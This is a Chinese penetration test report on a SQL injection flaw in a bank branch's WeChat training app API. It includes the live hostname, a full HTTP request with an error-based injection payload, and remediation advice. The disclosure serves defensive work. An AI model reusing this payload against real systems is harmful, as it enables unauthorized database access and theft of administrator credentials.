渗透测试报告 漏洞名称：188储银行河源市分行-保密学习-存在SQL注入漏洞（第二处getBanner接口） 漏洞等级：高危 所在位置：https://study.mzzfwl.com/api/Index/getBanner 漏洞描述：邮储银行河源市分行-保密学习-存在SQL注入漏洞（第二处getBanner接口） 漏洞详情： 访问邮储银行河源市分行微信公众号-保密学习 [图片]  首页存在接口获取Banner   [图片]  存在SQL注入漏洞 POST /api/Index/getBanner HTTP/2 Host: study.mzzfwl.com Content-Length: 113 Xweb_xhr: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 MicroMessenger/7.0.20.1781(0x6700143B) NetType/WIFI MiniProgramEnv/Windows WindowsWechat/WMPF WindowsWechat(0x6309080f)XWEB/8501 Content-Type: application/json Accept: */* Accept-Language: * Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://servicewechat.com/wxc8321ccadec18dbf/8/page-frame.html Accept-Encoding: gzip, deflate   {"page":1,"pagesize":5,"platform":"wx-hyxx'or(1)=cast(version() as numeric)and''='","token":0,"_device":"wechat"}     通过报错注入可获取到数据库版本 [图片]  也可以获取数据库里的数据，比如管理员账号、密码 [图片]  [图片]    造成影响: 攻击者可以利用该漏洞执行任意SQL语句，如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。 修复建议： 1、对参数进行严格过滤；2、对进入数据库的特殊字符（'"\<>&*;等）进行转义处理，或编码转换；3、确认每种数据的类型，比如数字型的数据就必须是数字，数据库中的存储字段必须对应为int型；4、数据长度应该严格规定，能在一定程度上防止比较长的SQL注入语句无法正确执行；5、严格限制网站所用数据库账号的权限，给此用户仅提供能够满足其工作的权限，从而最大限度的减少注入攻击对数据库的危害。